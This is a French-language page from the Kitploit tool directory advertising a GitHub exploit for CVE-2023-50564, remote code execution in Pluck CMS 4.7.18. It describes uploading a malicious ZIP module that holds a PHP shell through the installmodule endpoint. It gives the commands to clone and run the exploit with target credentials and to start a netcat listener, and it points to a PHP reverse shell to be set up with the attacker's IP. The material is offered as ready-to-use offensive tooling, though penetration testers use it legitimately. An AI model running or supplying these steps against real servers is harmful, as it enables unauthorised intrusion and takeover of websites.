Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-50564 — Pluck v4.7.18 - Exécution de code à distance (RCE) | Kitploit
Outils/GitHubGitHub/glynzr/cve-2023-50564
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubglynzr/cve-2023-50564

CVE-2023-50564

Pluck v4.7.18 - Exécution de code à distance (RCE)

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-50564

📌 Description

Cet exploit permet à un administrateur authentifié de Pluck CMS v4.7.18 de téléverser un module ZIP malveillant contenant un shell PHP, conduisant à une exécution de code à distance (RCE).


⚙️ Fonctionnalités

  • S'authentifie auprès de la cible à l'aide d'un nom d'utilisateur et d'un mot de passe valides
  • Crée automatiquement une archive ZIP à partir d'un fichier PHP fourni
  • Téléverse le module sur le point de terminaison vulnérable installmodule
  • Déclenche la charge utile et affiche la sortie
  • Prend en charge la cible, le port, les identifiants et le chemin du shell personnalisés

🚀 Utilisation

root@kitploit:~
git clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt

python3 exploit.py -h
root@kitploit:~
python3 exploit.py -t <target> -u <username> -pass <password> -path <path_to_php_shell> [-p <port>]
  • Le port est facultatif et sa valeur par défaut est 80 s'il n'est pas spécifié.
  • Lors de la spécification de la cible, l'adresse IP ou le nom de domaine est requis (par exemple, 127.0.0.1 ou test.domain).

Exemple d'exploit

Tout d'abord, un écouteur de reverse shell doit être démarré sur la machine de l'attaquant (cet onglet du terminal ne doit pas être fermé) :

root@kitploit:~
nc -nvlp <specify port>

Ensuite, téléchargez le reverse shell PHP depuis https://github.com/pentestmonkey/php-reverse-shell et personnalisez-le selon la machine de l'attaquant. (IP, port)

Exécutez le code de l'exploit dans un autre onglet :

root@kitploit:~
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php
Télécharger l’outil